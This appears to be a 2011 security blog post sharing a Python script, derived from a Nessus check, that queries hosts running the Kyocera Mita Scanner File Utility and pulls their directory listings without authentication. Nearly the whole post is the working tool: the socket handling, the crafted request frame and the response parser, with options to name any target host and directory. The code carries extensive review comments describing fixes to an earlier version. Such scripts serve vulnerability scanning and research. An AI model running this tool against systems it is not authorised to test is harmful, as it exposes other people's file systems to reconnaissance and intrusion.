Wednesday, July 6, 2011

Kyocera Mita Scanner File Utility Query

I wrote this little script to pull directory listings from hosts running the Kyocera Mita Scanner File Utility.

I don't know if all Mita Scanner File Utilities are vulnerable to this, but it looks sexier than my crappy script :)

root@bt:~ # cat kyocera_check.py
#!/usr/bin/env python
# Cheapo check for Kyocera Mita File Utilities, pulls dir info from them
#
#
# Based on the NASL plugin defined here:
# http://www.nessus.org/plugins/index.php?view=single&id=34117
# by brad a.
import binascii
import getopt
import socket
import sys

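def usage():
    """Return the command-line help text as a single string.

    Every option is on its own line, and the default port shown is 37100,
    the value main() actually assigns (the help text previously said 31700).
    """
    lines = [
        "Options:",
        "\t-h <host>\tTarget host",
        "\t-p <port>\tPort (Default 37100)",
        "\t-d <dir>\t Directory (Default c:\\)",
        "\t-v\tverbose",
    ]
    return "\n".join(lines)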

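def parse_resp(recv_data):
    """Print the names carried in a directory-listing response.

    The first 10 bytes are skipped as a header.  The rest is read as a run
    of entries, each a one-byte length followed by that many bytes of name.
    Nothing is returned; names are printed one per line, tab-indented.

    recv_data comes straight off the socket from the queried device, so it
    is untrusted: bytes outside printable ASCII are shown as \\xNN escapes
    instead of being written raw, which keeps control sequences embedded in
    a name from reaching the operator's terminal.
    """
    header_size = 10  # bytes; the original skipped 20 hex digits
    data = bytearray(recv_data)  # indexes as ints on Python 2 and 3

    print("[+]Found the Following Contents:")
    pos = header_size
    while pos < len(data):
        name_len = data[pos]
        pos += 1
        # A length that overruns the buffer yields a shortened name; main()
        # reads at most 1024 bytes, so a long listing can end mid-entry.
        raw_name = data[pos:pos + name_len]
        pos += name_len
        shown = "".join(
            chr(b) if 0x20 <= b < 0x7F else "\\x%02x" % b for b in raw_name
        )
        print("\t" + shown)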




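def main():
    """Query a Kyocera Mita Scanner File Utility listener for a directory listing.

    Options: -h <host> (required), -p <port> (default 37100), -d <dir>
    (default is the C: drive root), -v (verbose hex dumps).

    Flow: connect, wait for the service banner, send one request frame that
    names the directory, read one response and pass it to parse_resp().
    Everything received is untrusted device output.
    """
    print("Kyocera Mita Scanner File Utility Query")
    print("by brad a.")
    print("----------------------------------------")

    try:
        # "v" was missing from the option string, so -v raised GetoptError
        # and verbose mode could never be switched on.
        opts, args = getopt.getopt(sys.argv[1:], "h:p:d:v", [])
    except getopt.GetoptError:
        print(usage())
        return

    port = 37100
    directory = "c:\\"
    host = None
    verbose = False

    for opt, value in opts:
        if opt == "-h":
            host = value
        elif opt == "-p":
            # connect() needs an integer; the raw option string made it fail.
            try:
                port = int(value)
            except ValueError:
                port = -1
        elif opt == "-d":
            directory = value
        elif opt == "-v":
            verbose = True

    if not host or not 0 < port < 65536:
        print(usage())
        return

    if not isinstance(directory, bytes):
        # Python 3 hands argv over as text.  The wire encoding is not stated
        # on this page; latin-1 maps one char to one byte.
        # NOTE(review): confirm the encoding the service expects.
        directory = directory.encode("latin-1", "replace")

    # Same bytes the original assembled via hex strings: 0x38 0x01 ("header"
    # in the original comment), a 16-bit value 4, then the directory name,
    # all preceded by a 16-bit big-endian length of what follows.
    payload = bytearray([0x38, 0x01, 0x00, 0x04]) + bytearray(directory)
    if len(payload) > 0xFFFF:
        print("[!] Error: directory too long for the 16-bit length prefix")
        return
    frame = bytearray([len(payload) >> 8, len(payload) & 0xFF]) + payload

    sock = socket.socket()
    sock.settimeout(2)

    print("[+] Targeting %s : %s" % (host, port))

    try:
        sock.connect((host, port))

        try:
            banner = sock.recv(1024)
        except socket.timeout:
            print("[ALERT] Client timed out!")
            banner = b""

        if not banner:
            print("[ALERT] Didn't Find banner!")
            return

        if verbose:
            # repr() keeps control bytes in the banner off the terminal.
            print("[+] Got Banner: %s" % repr(banner))
            print("[+] in hex: %s" % binascii.hexlify(banner).decode("ascii"))
            print("[+] To send:")
            print("[+] H: %s" % binascii.hexlify(bytes(frame)).decode("ascii"))

        # sendall() returns None on success and raises on failure, so the
        # original `if error:` test could never fire; failures are reported
        # by the socket.error handler below.
        sock.sendall(bytes(frame))

        try:
            # NOTE(review): a single 1024-byte read; a longer listing, or one
            # split across TCP segments, is cut short here.
            reply = sock.recv(1024)
        except socket.timeout:
            print("[ALERT] Timeout!")
            return

        if reply:
            if verbose:
                print("[+] Got response:")
                print("[+] H: %s" % binascii.hexlify(reply).decode("ascii"))
            parse_resp(reply)
    except socket.error as exc:
        # Covers refused/unreachable/timed-out connects and send failures.
        print("[!] Error: %s" % exc)
    finally:
        # Always release the socket, including on the early returns above.
        try:
            sock.shutdown(socket.SHUT_RDWR)
        except socket.error:
            pass  # never connected, or the peer already closed
        sock.close()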
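# Run only when executed as a script, so importing this file (for example to
# reuse parse_resp) does not open a network connection as a side effect.
if __name__ == "__main__":
    main()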
